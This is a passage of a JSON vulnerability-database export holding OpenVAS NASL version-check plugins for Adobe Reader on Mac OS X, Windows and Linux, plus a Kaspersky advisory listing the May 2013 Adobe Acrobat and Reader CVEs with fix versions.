get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803614", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_macosx.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803614\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:15:11 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Mac OS X\nAdobe Reader X Version 10.x prior to 10.1.7 on Mac OS X\nAdobe Reader XI Version 11.x prior to 11.0.03 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803613", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_win.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803613\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 09:32:40 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Windows\n\nAdobe Reader X Version 10.x prior to 10.1.7 on Windows\n\nAdobe Reader XI Version 11.x prior to 11.0.03 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer && readerVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:07", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803615", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_lin.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803615\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 09:55:39 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9\")\n{\n if(version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:36", "bulletinFamily": "info", "description": "### *Detect date*:\n08/08/2013\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Acrobat & Reader. Malicious users can exploit these vulnerabilities to cause denial of service, bypass security, obtain sensitive information or arbitrary code execution.\n\n### *Affected products*:\nAdobe Reader XI versions 11.0.02 and earlier \nAdobe Reader X versions 10.1.6 and earlier \nAdobe Reader 9 versions 9.5.4 and earlier \nAdobe Acrobat XI versions 11.0.02 and earlier \nAdobe Acrobat X versions 10.1.6 and earlier \nAdobe Acrobat 9 versions 9.5.4 and earlier\n\n### *Solution*:\nUpdate to latest version \n[get reader](<https://get.adobe.com/reader/?loc=ru>)\n\n### *Original advisories*:\n[APSB](<http://www.adobe.com/support/security/bulletins/apsb13-15.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Reader](<https://threats.kaspersky.com/en/product/Adobe-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2013-3346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3346>)10.0Critical \n[CVE-2013-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3342>)10.0Critical \n[CVE-2013-3341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3341>)10.0Critical \n[CVE-2013-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3340>)10.0Critical \n[CVE-2013-3339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3339>)10.0Critical \n[CVE-2013-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3338>)10.0Critical \n[CVE-2013-3337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3337>)10.0Critical \n[CVE-2013-2736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2736>)10.0Critical \n[CVE-2013-2737](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2737>)5.0Critical \n[CVE-2013-2734](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2734>)10.0Critical \n[CVE-2013-2735](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2735>)10.0Critical \n[CVE-2013-2732](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2732>)10.0Critical \n[CVE-2013-2733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2733>)10.0Critical \n[CVE-2013-2730](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2730>)10.0Critical \n[CVE-2013-2731](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2731>)10.0Critical \n[CVE-2013-2727](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2727>)10.0Critical \n[CVE-2013-2729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729>)10.0Critical \n[CVE-2013-2726](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2726>)10.0Critical \n[CVE-2013-2725](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2725>)10.0Critical \n[CVE-2013-2718](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2718>)10.0Critical \n[CVE-2013-2550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2550>)7.5Critical \n[CVE-2013-2720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2720>)10.0Critical \n[CVE-2013-2719](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2719>)10.0Critical \n[CVE-2013-2722](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2722>)10.0Critical \n[CVE-2013-2721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2721>)10.0Critical \n[CVE-2013-2724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2724>)10.0Critical \n[CVE-2013-2723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2723>)10.0Critical \n[CVE-2013-2549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2549>)7.5Critical", "modified": "2019-03-07T00:00:00", "published": "2013-08-08T00:00:00", "id": "KLA10457", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10457", "title": "\r KLA10457Adobe Acrobat & Reader multiple vulnerabilities ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}